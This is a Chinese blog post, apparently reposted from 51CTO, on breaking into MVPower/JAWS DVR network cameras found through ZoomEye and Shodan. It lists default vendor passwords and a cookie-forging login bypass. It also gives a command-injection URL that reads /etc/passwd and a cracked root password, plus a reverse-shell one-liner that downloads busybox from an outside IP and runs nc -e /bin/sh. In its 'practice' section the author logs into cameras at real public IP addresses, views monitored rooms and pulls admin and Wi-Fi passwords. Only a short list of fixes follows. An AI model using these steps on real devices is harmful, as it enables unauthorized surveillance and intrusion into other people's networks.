使用Zoomeye渗透网络摄像头

简介:

使用Zoomeye渗透网络摄像头

simeon

    网络摄像头(IP CAMERAS)在日常生活中越来越普及,交通路口抓取车牌号码,幼儿园用来监控小孩,小区车牌识别系统等等,这些摄像头会跟计算机或者录像等硬件设备连接,以便进行图像存储和及时浏览。很多摄像头还直接跟网络连接,以方便客户通过浏览器或者客户端进行连接管理和查看。商家的本意是为了方便用户进行查看,但很多网络摄像头由于厂商对安全重视不够,黑客通过技术手段可以很方便对存在漏洞的网络摄像头进行存取和浏览,在有些情况下,还可以获取网络摄像头所在服务器的权限,甚至可以渗透进入该摄像头所在网络,危害实在很大。

一、存在漏洞分析

   AndrewTierney在其Blog上公布了一片有关摄像头漏洞利用的文章(https://www.pentestpartners.com/blog/pwning-cctv-cameras/)。归纳其核心如下:

   1.存在弱口令漏洞

   简称为“CCTV”(Mvpower 8 Channel Security DVR Full D1 H.264CCTV Real-time Network Digital Video Recorder Mobile Motion Detection,P2P HDMIAlarm Email for CCTV Surveillance Cmeras Systemamazon购买地址http://www.amazon.co.uk/dp/B0162AQCO4,存在弱口令admin密码为空。收集的其它几款网络摄像机的口令如下:

 1)海康威视IP网络摄像机:超级用户:admin,超级用户密码:12345

 2)大华网络摄像机:用户名:admin,密码:888888

 3)天地伟业网络摄像机:用户名:Admin,密码:111111

2.登录密码绕过漏洞

   我们可以对之前用默认密码成功登录的页面进行抓包,找到处理页面登录逻辑的js,对处理页面登录的逻辑分析发现,存在登录绕过漏洞,代码如下:

$(document).ready(function(){

         dvr_camcnt= Cookies.get("dvr_camcnt");

         iSetAble= Cookies.get("iSetAble");

         iPlayBack= Cookies.get("iPlayBack");

         dvr_usr= Cookies.get("dvr_usr");

         dvr_pwd= Cookies.get("dvr_pwd");

         if(iSetAble== '0'){

                 $('#pb_settings').css('display','none');

                 }

         if(iPlayBack== '0'){

                 $('#pb_review').css('display','none');

                 }

         if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)

         {

                 location.href= "/index.html";

         }

   系统管理页面直接通过js检查cookie是否为空来判断用户是否登录。现在竟然还有程序员这样来写登录状态判断。

   于是,通过伪造cookie便可以绕过登录检查。通过代码可以看到需要伪造三个cookie值,dvr_camcntdvr_usr=admindvr_pwd=123。直接打开http://xx.xx.xx.xx/view2.html时,抓包发现系统会自动设置该cookie参数的值,这个值需要记录下来,否则后面填错的话是看不到监控内容的。dvr_usrdvr_pwd可以随便设置,只要不为空就好,如图1所示。保存后,重新刷新一下http://xx.xx.xx.xx/view2.html,便可以成功登录系统。

wKiom1bL1USC6rH2AAFzzYNqrMw835.jpg

1密码绕过漏洞

3.直接获取webshell及其root密码

   直接访问http://www.antian365.com/shell?cat /etc/passwd即可获取服务器root帐号密码,如图2所示。获取其root帐号密码为a03e3thxwWU0g,经破解其明文为“juantech”。

wKiom1bL1VDTXzrQAABnsrigk70092.jpg

2获取webshell

4.获取反弹shell

  执行以下命令:

  cd/root/rec/a1 && wget http://212.111.43.161/busybox &&chmod +xbusybox&& ./busybox  nc 122.115.47.398000 -e /bin/sh -e /bin/sh,将反弹shell122.115.47.398000端口。还可以执行命令“http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh -p 25”通过telnet 目标IP直接进入系统。

二、实战演练

   通过上面的漏洞分析,我们可以对存在漏洞的CCTV网络摄像头进行实际漏洞测试,以验证漏洞的真实性和掌握漏洞利用方法。

   1.确定cctv网络摄像头关键字“JAWS

  kaliLinux打开bannergrab,填上设备的IP地址和web端口号,banner抓取结果如图3所示,其中关键字为Server后的字符串“JAWS”。

wKioL1bL1crQVGNjAADIzz-xvqw213.jpg

3获取关键字

2.快速获取存在的目标服务器

   在本例中使用zoomeye进行检索,输入地址https://www.zoomeye.org/search?q=JAWS 直接进行查询,也可以使用shodan进行检索(https://www.shodan.io/search?query=JAWS%2F1.0),如图4所示,获取了找到约37,726 条结果, 34,263 个主机 (0.096 )

wKiom1bL1WmiH3cDAAI6Dgcx-GA723.jpg

4检索关键字“JAWS

3.随机对目标进行访问

   在检索结果中随机对结果进行访问,打开http://223.255.146.74/,用户名输入admin密码为空,直接登录系统,如图5所示,可以查看监控的房间和画面。

wKioL1bL1hXSpvhYAAo1RPpgIsM690.jpg

5获取访问权限

4.直接获取访问密码

  使用命令“shell?cat%20/tmp/usrm.ini”可以直接获取访问密码,例如http://210.21.34.206/shell?cat%20/tmp/usrm.ini可以获取默认管理员密码为空,如图6和图7所示。将默认密码进行修改后,重新访问,其密码已经写入到/tmp/usrm.ini文件中。

wKiom1bL1beD5HihAAC-2f4McDQ466.jpg

6直接获取管理员密码

wKiom1bL1cPD5oanAADDXocSq4M073.jpg

7修改后的密码直接明文保存

   5.获取无线网络密码

   在其网络设置中可以直接获取其无线AP的名称及其密码,如图8所示。

wKiom1bL1dSA8N-2AALQtHrDJrs509.jpg

   6.反弹shell测试

   对部分目标进行了反弹shell测试,均为成功,可能是无写权限,下载http://212.111.43.161/busybox文件大概需要100M

三、防范措施及建议

  目前网上已经出现利用该漏洞恶意程序,而官方未发布相应补丁。用户可采取以下措施加固安全:

1.修改默认root密码为其他强健密码。

2.对外不提供web访问。或者将地址设置为一个复杂的名称,使其默认地址不被访问。

3.对服务器可写进行严格限制。

4.修改默认admin密码。

参考文章:

1.http://www.freebuf.com/tools/5950.html

2.http://www.ijiandao.com/safe/cto/5450.html

3.http://www.myhack58.com/Article/html/3/8/2015/64210.htm

4.http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml

5.http://security.zol.com.cn/443/4439365_all.html

6.http://bobao.360.cn/news/detail/1388.html

7.http://www.myhack58.com/Article/html/2/5/2015/58087.htm

8.http://drops.wooyun.org/category/papers



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/1744228

相关文章
|
数据安全/隐私保护 计算机视觉
使用opencv调用网络摄像头出现错误method DeSCRIBE failed
使用opencv调用网络摄像头出现错误method DeSCRIBE failed
171 0
|
2月前
|
机器学习/深度学习 算法 数据安全/隐私保护
基于深度学习网络的USB摄像头实时视频采集与水果识别matlab仿真
本项目展示了使用MATLAB 2022a和USB摄像头识别显示器上不同水果图片的算法。通过预览图可见其准确识别效果,完整程序无水印。项目采用GoogleNet(Inception-v1)深度卷积神经网络,利用Inception模块捕捉多尺度特征。代码含详细中文注释及操作视频,便于理解和使用。
|
2月前
|
机器学习/深度学习 数据采集 算法
基于深度学习网络的USB摄像头实时视频采集与火焰检测matlab仿真
本项目使用MATLAB2022a实现基于YOLOv2的火焰检测系统。通过USB摄像头捕捉火焰视频,系统实时识别并标出火焰位置。核心流程包括:视频采集、火焰检测及数据预处理(图像标准化与增强)。YOLOv2模型经特定火焰数据集训练,能快速准确地识别火焰。系统含详细中文注释与操作指南,助力快速上手。
|
4月前
|
机器学习/深度学习 算法 计算机视觉
基于深度学习网络的USB摄像头实时视频采集与人脸检测matlab仿真
**摘要 (Markdown格式):** ```markdown - 📹 使用USB摄像头(Tttttttttttttt666)实时视频检测,展示基于YOLOv2在MATLAB2022a的实施效果: ``` Tttttttttttttt1111111111------------5555555555 ``` - 📺 程序核心利用MATLAB视频采集配置及工具箱(Dddddddddddddd),实现图像采集与人脸定位。 - 🧠 YOLOv2算法概览:通过S×S网格预测边界框(B个/网格),含坐标、类别概率和置信度,高效检测人脸。
|
3月前
|
机器学习/深度学习 算法 BI
基于深度学习网络的USB摄像头实时视频采集与手势检测识别matlab仿真
**摘要:** 本文介绍了使用MATLAB2022a实现的基于GoogLeNet的USB摄像头手势识别系统。系统通过摄像头捕获视频,利用深度学习的卷积神经网络进行手势检测与识别。GoogLeNet网络的Inception模块优化了计算效率,避免过拟合。手势检测涉及RPN生成候选框,送入网络进行分类。系统架构包括视频采集、手势检测与识别、以及决策反馈。通过GPU加速和模型优化保证实时性能,应用于智能家居等场景。
|
3月前
|
Linux 网络安全 数据安全/隐私保护
网络安全教程-------渗透工具Kali,官网链接,ARM的介绍,Mobil,华为小米,oppe手机,是无法刷入第三方的操作系统的,E+手机,谷歌的picksoul,或者三星手机,系统盘是WSL的
网络安全教程-------渗透工具Kali,官网链接,ARM的介绍,Mobil,华为小米,oppe手机,是无法刷入第三方的操作系统的,E+手机,谷歌的picksoul,或者三星手机,系统盘是WSL的
|
前端开发 计算机视觉 Python
Python和网络摄像头也有关系?
Python和网络摄像头也有关系?
|
5月前
|
存储 监控 安全
如何防范网络渗透攻击
如何防范网络渗透攻击
111 3
|
5月前
|
安全 网络安全
网络渗透技术
网络渗透技术
107 2
|
运维 监控 安全
软件源码开发,网络中的“摄像头”:运维监控系统
总之,监控运维系统在软件源码开发平台中有着不可或缺的作用,通过以上分析,可以看出监控运维系统不只是监控着服务器、数据库、操作系统等,还可以为软件源码开发平台运维团队提供资源管理、容量规划、日志与事件记录等作用,确保着软件源码开发平台的系统和服务的正常运行。
软件源码开发,网络中的“摄像头”:运维监控系统
下一篇
无影云桌面